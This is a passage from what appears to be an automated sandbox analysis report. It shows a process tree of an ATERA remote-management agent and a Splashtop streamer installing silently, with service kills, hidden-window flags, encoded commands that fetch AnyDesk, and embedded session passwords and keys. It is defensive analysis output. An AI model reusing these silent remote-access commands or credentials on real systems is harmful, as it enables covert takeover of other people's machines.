            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{BE375894-AE7F-4871-961E-273593A51BF3}
            3⤵
            • Executes dropped EXE
            PID:5276
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{904509A5-9590-4F8E-99B7-5666694809E7}
            3⤵
            • Executes dropped EXE
            PID:5564
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{1EF9E44A-FD07-456C-B09A-7C8C034E0C25}
            3⤵
            • Executes dropped EXE
            PID:5624
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{19061055-A7B9-41C4-9F76-F943407D30D0}
            3⤵
            • Executes dropped EXE
            PID:5508
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{BCA78458-D41D-46D7-BFD8-7B3DD3D66162}
            3⤵
            • Executes dropped EXE
            PID:5432
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{918AF76B-147E-4DD8-8CE0-B8626E87F088}
            3⤵
            • Executes dropped EXE
            PID:5896
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{DC4F6BBA-68D6-43AD-A066-6D67A1F1C775}
            3⤵
            • Executes dropped EXE
            PID:5572
          • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
            C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{ED21DC91-AC5D-4866-84A4-3EE46205F9BA}
            3⤵
              PID:5604
            • C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe
              C:\Windows\TEMP\{F80D2045-53BF-4283-B498-58FD4EF00198}\_is185A.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{44ECA6C2-BD43-487C-BF3A-4FA8501543E0}
              3⤵
                PID:5480
              • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe
                "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe" -r
                3⤵
                • System Location Discovery: System Language Discovery
                PID:5844
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding 78D59B933F1D5FAFB325945DB962DB3A E Global\MSI0000
              2⤵
              • System Location Discovery: System Language Discovery
              PID:6068
              • C:\Windows\SysWOW64\rundll32.exe
                rundll32.exe "C:\Windows\Installer\MSI6A02.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240676296 464 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                3⤵
                • Drops file in System32 directory
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:6216
              • C:\Windows\SysWOW64\rundll32.exe
                rundll32.exe "C:\Windows\Installer\MSI704C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240677062 468 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                3⤵
                • Blocklisted process makes network request
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:6924
              • C:\Windows\SysWOW64\rundll32.exe
                rundll32.exe "C:\Windows\Installer\MSI76C6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240678578 473 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                3⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:7060
              • C:\Windows\SysWOW64\NET.exe
                "NET" STOP AteraAgent
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4424
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 STOP AteraAgent
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:6644
              • C:\Windows\SysWOW64\TaskKill.exe
                "TaskKill.exe" /f /im AteraAgent.exe
                3⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                PID:6732
              • C:\Windows\syswow64\NET.exe
                "NET" STOP AteraAgent
                3⤵
                • System Location Discovery: System Language Discovery
                PID:6804
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 STOP AteraAgent
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2452
              • C:\Windows\syswow64\TaskKill.exe
                "TaskKill.exe" /f /im AteraAgent.exe
                3⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                PID:1992
              • C:\Windows\SysWOW64\rundll32.exe
                rundll32.exe "C:\Windows\Installer\MSI9D71.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240688484 511 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                3⤵
                • Blocklisted process makes network request
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:3508
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /u
              2⤵
              • Drops file in System32 directory
              PID:1028
            • C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe
              "C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="" /CompanyId="" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="" /AgentId="4cdbb411-0f84-49b4-8661-b46deae01f68"
              2⤵
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:3960
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Checks SCSI registry key(s)
            • Suspicious use of AdjustPrivilegeToken
            PID:1252
          • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
            "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
            1⤵
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:908
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
              2⤵
              • Launches sc.exe
              PID:3408
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "a9db19f1-d043-4ff0-8edf-93de76110f21" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000N8afVIAR
              2⤵
              • Drops file in System32 directory
              • Executes dropped EXE
              PID:5024
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "25474949-6542-451e-bd84-ca6e6ab99f13" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000N8afVIAR
              2⤵
              • Executes dropped EXE
              PID:3308
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "e1ab57ca-0a6d-4862-a65c-85ed7d88fa94" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000N8afVIAR
              2⤵
              • Executes dropped EXE
              PID:3904
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "ce6cf2d2-6092-43d2-bcbd-aa6d2193121b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000N8afVIAR
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4712
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files\Microsoft Office\Office16\ospp.vbs" /dstatus
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1112
                • C:\Windows\system32\cscript.exe
                  cscript "C:\Program Files\Microsoft Office\Office16\ospp.vbs" /dstatus
                  4⤵
                  • Modifies data under HKEY_USERS
                  PID:896
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "fa1ee7ce-0d7c-4e8a-9c81-825b7e0a0c6c" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000N8afVIAR
              2⤵
              • Drops file in System32 directory
              • Executes dropped EXE
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3328
              • C:\Windows\TEMP\SplashtopStreamer.exe
                "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1848
                • C:\Windows\Temp\unpack\PreVerCheck.exe
                  "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3924
                  • C:\Windows\SysWOW64\msiexec.exe
                    msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2452
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "eacd3cdd-5093-49d0-9b18-f4a878ed7f6b" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000N8afVIAR
              2⤵
              • Drops file in System32 directory
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3220
          • C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
            "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
            1⤵
            • Drops file in Program Files directory
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:4456
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
              2⤵
              • Launches sc.exe
              PID:2572
            • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
              "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "4b3d6e09-70b4-42c4-9816-3ee438e56c58" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000N8afVIAR
              2⤵
              • Modifies data under HKEY_USERS
              PID:1848
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files\Microsoft Office\Office16\ospp.vbs" /dstatus
                3⤵
                  PID:3876
                  • C:\Windows\system32\cscript.exe
                    cscript "C:\Program Files\Microsoft Office\Office16\ospp.vbs" /dstatus
                    4⤵
                    • Modifies data under HKEY_USERS
                    PID:3368
              • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "a82046b3-bbbd-4a07-821d-640acca707e7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000N8afVIAR
                2⤵
                • Drops file in System32 directory
                PID:5464
                • C:\Windows\SYSTEM32\msiexec.exe
                  "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                  3⤵
                    PID:1844
                • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                  "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "21352f6b-9093-4b9c-a4fa-030f13ad279a" agent-api.atera.com/Production 443 or8ixLi90Mf "downloadifneeded" 001Q300000N8afVIAR
                  2⤵
                    PID:5320
                    • C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exe
                      "C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exe" -a "st-streamer://com.splashtop.streamer/?rmm_code=hZCDFPhK75mJ&rmm_session_pwd=a9c8483a234929c801bf046a50c3317d&rmm_session_pwd_ttl=86400"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4208
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "c43fb612-0202-4e79-951b-375967aaadef" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    • Modifies registry class
                    PID:3640
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "9df28fdc-8d92-43e4-8b2e-27584f089f57" agent-api.atera.com/Production 443 or8ixLi90Mf "heartbeat" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    PID:548
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "d9a296d8-209b-4335-8503-60f4d5c58dd1" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:6600
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "b5bfba8f-b65d-4676-a637-10617599f1b5" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    PID:6640
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "565c028a-dd76-4fa7-bd2c-0795014b81ea" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    PID:6704
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "97836fd2-869c-41b3-8a8a-3aa6283250a7" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Program Files directory
                    PID:6752
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "7e56e781-f4d5-44f7-8387-42afb8b25a3f" agent-api.atera.com/Production 443 or8ixLi90Mf "eyJBZENvbW1hbmRUeXBlIjo1LCJJbnN0YWxsYXRpb25GaWxlVXJsIjoiaHR0cHM6Ly9nZXQuYW55ZGVzay5jb20vOENRc3U5a3YvQW55RGVza19DdXN0b21fQ2xpZW50Lm1zaSIsIkZvcmNlSW5zdGFsbCI6ZmFsc2UsIlRhcmdldFZlcnNpb24iOiIifQ==" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    PID:6972
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "e1a4f9c2-a602-44ff-be8c-0629b28e3df1" agent-api.atera.com/Production 443 or8ixLi90Mf "eyJDb21tYW5kTmFtZSI6Imluc3RhbGxkb3RuZXQiLCJEb3ROZXRWZXJzaW9uIjoiNi4wLjM1IiwiTWFjQVJNRG93bmxvYWRVcmwiOiJodHRwczovL2Rvd25sb2FkLnZpc3VhbHN0dWRpby5taWNyb3NvZnQuY29tL2Rvd25sb2FkL3ByLzU4OTc4Y2ViLTVkZTMtNDllMi1iNTcxLTk3MjgyNWIwOGYwYS9mMWJkOWIxYmI1YjI1YjhjOWNlZTQwZWQ5YTNkODAyMy9kb3RuZXQtcnVudGltZS02LjAuMzUtb3N4LWFybTY0LnBrZyIsIk1hY1g2NERvd25sb2FkVXJsIjoiaHR0cHM6Ly9kb3dubG9hZC52aXN1YWxzdHVkaW8ubWljcm9zb2Z0LmNvbS9kb3dubG9hZC9wci8yNjkyMDY2NC1kNzU0LTRmNzYtOWM5OS1lNjkxMTYzNDhlODIvYTQwMzE1MzcxY2M2MDdjOWYxODQ3OGM5M2YyYTY3NmEvZG90bmV0LXJ1bnRpbWUtNi4wLjM1LW9zeC14NjQucGtnIiwiV2luQVJNRG93bmxvYWRVcmwiOiJodHRwczovL2Rvd25sb2FkLnZpc3VhbHN0dWRpby5taWNyb3NvZnQuY29tL2Rvd25sb2FkL3ByL2EyMjNjNDViLTQ3NzctNDA1Ni1hZWEyLTY1M2M1NzZkODExNS9iZjhhZjYzYzZlNjI1YmU0YWZhODVlYzA5M2U4MWU2NS9kb3RuZXQtcnVudGltZS02LjAuMzUtd2luLWFybTY0LmV4ZSIsIldpblg2NERvd25sb2FkVXJsIjoiaHR0cHM6Ly9kb3dubG9hZC52aXN1YWxzdHVkaW8ubWljcm9zb2Z0LmNvbS9kb3dubG9hZC9wci9jNGY2NTYyMS1iMzZiLTQ2YTktODM4MC1kNWI2NjBiZWYyN2UvMDE4NWZkNzIwNTVkY2RjYTg2MTY2Yjk5YWRkNzE2ODYvZG90bmV0LXJ1bnRpbWUtNi4wLjM1LXdpbi14NjQuZXhlIiwiV2luWDg2RG93bmxvYWRVcmwiOiJodHRwczovL2Rvd25sb2FkLnZpc3VhbHN0dWRpby5taWNyb3NvZnQuY29tL2Rvd25sb2FkL3ByL2E5MGZiNWRjLWY0ODgtNDAwZS04NWNhLTg0M2ExMzY0MGY1Ni80ODNkMjQ2MzhjYzJiZWRhZGRhYjQzNzM0YWEyZTQ0Ny9kb3RuZXQtcnVudGltZS02LjAuMzUtd2luLXg4Ni5leGUiLCJNYWNBUk1DaGVja3N1bSI6IlVlSmJHR0dWb2NwZmdpckU2eDVNN29MQzhBS2NOSjk4SDNFcmJ0L0taS0dPdWxpQ1Flc1x1MDAyQmx6Wno5XHUwMDJCcnQwdXJMZ2FEeng0cmtXZm0veWg5UWI1RFRKUT09IiwiTWFjWDY0Q2hlY2tzdW0iOiJaZFZQVmRFSG40ZXFkdlNPUksxRUpXcjdnOUt5b0RZSXp6czQzOUxKeHYvZkFRdG5iTjk3OE8yTm1pNGtRSFNkdlJJazEvNFx1MDAyQjlycTZPMEx2Q2FnL1d3PT0iLCJXaW5BUk1DaGVja3N1bSI6IldlTGhodXU3Vi96NEs2WGVubDBINDVWWDExb0ZhdHdvV1BNa2pEQ2dobmhrTm5US2tqZjc0eUFcdTAwMkJcdTAwMkJ0Ri9VU1ZDZXE2T2dRbHI2V1Y1dU1rRWwxUVdqUT09IiwiV2luWDY0Q2hlY2tzdW0iOiJEREtSSlRFanp6XHUwMDJCSWUxMldTM2Y0aHVKQlNpeXR4TkRwQlI2SXpFeHpkM2ZBb0toNVV5MkEwbTlKOFU0ZVh5VmJxeEhjZzB3M25hWW1FZFNFeEwzMEZnPT0iLCJXaW5YODZDaGVja3N1bSI6IjdtSUF5bG9IeWxIVFVJakhud3NXeVVOXHUwMDJCVWU0alk3eXBrZVx1MDAyQnEyM2xNbEdzR0hpVUc1b21scW1LOVEvYVViODhLXHUwMDJCTnBGMWNaUVpXQjVJb3ZtTzVucWN3PT0iLCJXb3Jrc3BhY2VJZCI6ImJmMGNlNDlkLTc3Y2YtNDcyMS1iZjcwLTU3Njg2MzgzYzlhYiIsIkxvZ05hbWUiOiJEb3ROZXRSdW50aW1lSW5zdGFsbGF0aW9uUmVwb3J0IiwiU2hhcmVkS2V5IjoialVJUy9UOUNSVkRlS3hZZzRVcjNhQ2hoV1F1Y1k3UFZ2d2cwekh1cUpzY3JUampRMkx3SzZVamZ1N2NBMk5wckFSMHIvU1JBWEpZWWxkUEtLRnlLS1E9PSJ9" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    PID:7160
                    • C:\Windows\SYSTEM32\cmd.exe
                      "cmd.exe" /K "cd /d C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\" /
                      3⤵
                      • System Time Discovery
                      PID:7028
                      • C:\Program Files\dotnet\dotnet.exe
                        dotnet --list-runtimes
                        4⤵
                        • System Time Discovery
                        PID:6480
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "2ee80545-9e6e-420b-8c20-16983522e56d" agent-api.atera.com/Production 443 or8ixLi90Mf "getlistofallupdates" 001Q300000N8afVIAR
                    2⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:6344
                  • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe
                    "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "41e850c9-525e-413b-b367-26f971e0c0c8" agent-api.atera.com/Production 443 or8ixLi90Mf "eyJBcmd1bWVudHMiOiJ7XHUwMDIyQ29tbWFuZE5hbWVcdTAwMjI6XHUwMDIybWFpbnRlbmFuY2VcdTAwMjIsXHUwMDIyRW5hYmxlZFx1MDAyMjp0cnVlLFx1MDAyMlJlcGVhdEludGVydmFsTWludXRlc1x1MDAyMjoxMCxcdTAwMjJEYXlzSW50ZXJ2YWxcdTAwMjI6MSxcdTAwMjJSZXBlYXREdXJhdGlvbkRheXNcdTAwMjI6MX0ifQ==" 001Q300000N8afVIAR
                    2⤵
                      PID:6420
                    • C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                      "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ed1a06c8-4f52-459a-851f-8f5ccd8dbe1e "996c5edb-700d-44e4-ad90-cd9b33b5fcaf" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000N8afVIAR
                      2⤵
                      • Writes to the Master Boot Record (MBR)
                      PID:6472
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                    1⤵
                    • Drops file in Windows directory
                    • Enumerates system info in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:4712
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffea453cc40,0x7ffea453cc4c,0x7ffea453cc58
                      2⤵
                        PID:4284
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2020,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2016 /prefetch:2
                        2⤵
                          PID:2524
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2180 /prefetch:3
                          2⤵
                            PID:4088
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2336,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2536 /prefetch:8
                            2⤵
                              PID:1516
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,5157645883148532263,10173469560886238655,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3216 /prefetch:1
                              2⤵
                                PID:5232
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
